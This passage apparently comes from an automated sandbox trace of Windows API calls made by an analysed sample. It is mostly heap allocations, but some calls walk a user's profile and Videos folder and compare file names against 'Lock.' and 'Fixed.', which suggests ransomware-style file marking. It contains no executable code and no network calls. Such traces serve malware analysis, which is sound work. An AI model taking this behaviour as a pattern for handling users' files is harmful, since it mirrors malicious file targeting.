hHeap=0x2af0000) returned 1 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0213.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fb40 [0213.834] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/RV_dV0DIDgvgK.avi", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\RV_dV0DIDgvgK.avi", lpFilePart=0x8cf650*="RV_dV0DIDgvgK.avi") returned 0x28 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fb40 | out: hHeap=0x2af0000) returned 1 [0213.834] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\RV_dV0DIDgvgK.avi" (normalized: "c:\\users\\fd1hvy\\videos\\rv_dv0didgvgk.avi")) returned 0xffffffff [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74d28 | out: hHeap=0x2af0000) returned 1 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0213.834] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0213.834] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.834] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0213.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0213.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0213.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0213.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0213.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0213.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0213.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0213.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sDbATpZQ6r.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DbATpZQ6r.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bATpZQ6r.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ATpZQ6r.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TpZQ6r.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pZQ6r.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZQ6r.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q6r.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6r.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0213.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0213.835] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0213.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0213.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0213.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0213.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0213.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2a77e90 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0213.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sDbATpZQ6r.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DbATpZQ6r.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bATpZQ6r.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ATpZQ6r.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TpZQ6r.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pZQ6r.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZQ6r.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q6r.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6r.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0213.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0213.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0213.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69670 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.837] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0213.837] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0213.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0213.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0213.838] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.838] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0213.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74980 [0213.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0213.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0213.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0213.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0213.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0213.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0213.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0213.839] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0213.840] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0213.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0213.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0213.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0213.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0213.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab080 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0213.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0213.841] RtlAllocateHeap 